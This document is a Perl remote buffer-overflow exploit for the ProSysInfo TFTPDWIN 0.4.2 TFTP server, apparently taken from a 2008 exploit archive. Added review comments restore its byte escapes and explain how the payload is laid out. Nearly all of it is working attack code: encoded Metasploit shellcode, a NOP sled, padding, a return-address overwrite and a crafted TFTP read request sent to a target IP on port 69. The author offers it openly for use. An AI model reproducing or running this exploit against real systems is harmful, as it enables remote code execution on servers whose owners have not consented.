
# Title : ProSysInfo TFTP server TFTPDWIN <= 0.4.2 Univ. Remote BOF Exploit
# Published : 2008-12-14
# Author : SkD


#!/usr/bin/perl
#
# ProSysInfo TFTP server TFTPDWIN <= 0.4.2
# Universal Remote Buffer Overflow Exploit
# [Works on all Windows versions.]
# ----------------------------------------
# Exploit by SkD (skdrat@hotmail.com)
#
# Let's take a description from their page at:
#      http://www.tftpserver.prosysinfo.com.pl
#
# "The TFTP Server TFTPDWIN software is a
#  multithreaded TFTP protocol server for
#  Windows 98/Me/2000/XP/2003. TFTP Server
#  TFTPDWIN is compatible with RFC 1350,
#  RFC 2347, RFC 2348, and RFC 2349, documents."
#
# Some of their clients include: CISCO, Alcatel-Lucent,
# Intel, AT&T, Panasonic, Boeing ...
#
# Wow, all of these companies use this software!
# This is pretty much serious.
#
# So this is my new exploit and I made it universal like
# the last one. This overflow was pretty much weird at
# first sight, but a bit of looking into the software
# can tell you many things about it!
#
# If Immunity (www.immunityinc.com) can make a commercial
# exploit for this and keep it for private clients,
# so can I ;) but to the public :). Have fun ladies &
# gents.
#
# Usage: prosystftpd_exploit.pl <target IP>
#
# Greets fly to InTeL.
#
# WARNING: Author has no responsibility over the damage
# you do using this!
 
 
 
use IO::Socket;
use warnings;
use strict;
 
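# Usage check: exactly one positional argument, the target host/IP.
#
# NOTE(review): the archived copy lost the backslashes of its "\n" escapes,
# so the banner printed as one run-on line; restored here. The e-mail is
# written with "\@" instead of the original "@ hotmail.com" workaround (an
# unescaped "@hotmail" would be interpolated as an array under strict).
# A usage error exits non-zero so a wrapper can tell it from a real run.
if (@ARGV != 1 || !length($ARGV[0])) {
    print "[x] ProSysInfo TFTP server TFTPDWIN <= 0.4.2\n";
    print "    Universal Remote Buffer Overflow Exploit\n\n";
    print "[x] Exploit by SkD (skdrat\@hotmail.com)\n\n";
    print "[x] Usage: prosystftpd_exploit.pl <target IP>\n\n";
    exit(1);
}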
 
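# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com
# Restricted chars = 0x00 0x6e 0x65 0x74
#
# NOTE(review): the archived copy of this script lost every backslash in its
# string escapes ("x29xc9" for "\x29\xc9", "n" for "\n"), so as published the
# payload and the TFTP framing were plain ASCII text. They are restored here:
# each "\xHH" is one byte, 16 per line, 160 bytes in total as the Metasploit
# banner above states. The Pex-encoded bytes contain none of the restricted
# values, which is what the author's banner line is recording.
my $shellcode =
    "\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xaf" .
    "\x4f\xb9\xec\x83\xee\xfc\xe2\xf4\x53\xa7\xfd\xec\xaf\x4f\x32\xa9" .
    "\x93\xc4\xc5\xe9\xd7\x4e\x56\x67\xe0\x57\x32\xb3\x8f\x4e\x52\xa5" .
    "\x24\x7b\x32\xed\x41\x7e\x79\x75\x03\xcb\x79\x98\xa8\x8e\x73\xe1" .
    "\xae\x8d\x52\x18\x94\x1b\x9d\xe8\xda\xaa\x32\xb3\x8b\x4e\x52\x8a" .
    "\x24\x43\xf2\x67\xf0\x53\xb8\x07\x24\x53\x32\xed\x44\xc6\xe5\xc8" .
    "\xab\x8c\x88\x2c\xcb\xc4\xf9\xdc\x2a\x8f\xc1\xe0\x24\x0f\xb5\x67" .
    "\xdf\x53\x14\x67\xc7\x47\x52\xe5\x24\xcf\x09\xec\xaf\x4f\x32\x84" .
    "\x93\x10\x88\x1a\xcf\x19\x30\x14\x2c\x8f\xc2\xbc\xc7\xbf\x33\xe8" .
    "\xf0\x27\x21\x12\x25\x41\xee\x13\x48\x2c\xd8\x80\xcc\x4f\xb9\xec";

# TFTP framing (RFC 1350): a read request is opcode 1, then the NUL-terminated
# file name, then the NUL-terminated transfer mode. The overflow is carried in
# the file name field; the mode is "netascii". Note the mode's 'n','e','t' are
# exactly the 0x6e 0x65 0x74 bytes listed as restricted above.
my $rrq_opcode = "\x00\x01";
my $mode       = "\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";    # "\0netascii\0"

# Overwrite value, 0x0040105D little-endian. Only three bytes are written
# here: the fourth (most significant) byte is the 0x00 that terminates the
# file name, i.e. the first byte of $mode placed directly after it. That is
# how a NUL reaches the stack although 0x00 is a restricted byte ("SkD's
# Tricks" in the original). NOTE(review): an address in the 0x0040xxxx range
# is presumably inside the tftpdwin.exe image rather than a system DLL, which
# would explain the "universal across Windows versions" claim -- but it is
# tied to this exact 0.4.2 build; verify against the binary before relying
# on it.
my $ret = "\x5d\x10\x40";

my $nopsled = "\x90" x 10;

# Filler between sled+shellcode and $ret. 274 is the author's tuned distance
# and the 10-byte sled is deliberately not part of it, so the file name is
# 10 + 274 + 3 bytes before its terminating NUL. Negative means the payload
# alone would already run past the overwrite point.
my $len = 274 - length($shellcode);

if ($len < 0) {
    print "[x] Your shellcode is too big! Find another way :)\n";
    exit(1);
}

my $overflow = "\x41" x $len;

# Datagram layout: opcode | sled | shellcode | filler | ret | \0netascii\0
my $packet = $rrq_opcode . $nopsled . $shellcode . $overflow . $ret . $mode;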
 
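# Send the crafted RRQ as a single datagram.
#
# TFTP runs over UDP (RFC 1350), so there is no handshake here:
# IO::Socket::INET->new() only creates the local socket and records the peer;
# it cannot tell whether anything is listening on port 69, and the daemon
# sends nothing back that this script reads. The final message therefore only
# means the datagram left this host -- whether the overflow fired has to be
# confirmed on the target (the payload runs calc.exe).
# NOTE(review): the archived copy lost the "\n" escapes in these messages and
# used indirect-object syntax (new IO::Socket::INET); both fixed here.
my $sock = IO::Socket::INET->new(
    Proto    => 'udp',
    PeerAddr => $ARGV[0],
    PeerPort => '69',
) or die "[x] Cannot create UDP socket for $ARGV[0]:69: $@\n";

print "[x] UDP socket ready, peer $ARGV[0]:69\n";
print "[x] Sending packet..\n";

# A rejected send (e.g. an unroutable host) is the only failure the UDP layer
# can report, so it is the one thing worth checking.
print {$sock} $packet or die "[x] Send failed: $!\n";

sleep(1);    # let the datagram go out before the socket is torn down
close $sock or warn "[x] close: $!\n";

print "[x] Packet sent. No feedback over UDP - check the target yourself.\n";
exit(0);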

# www.Syue.com [2008-12-14]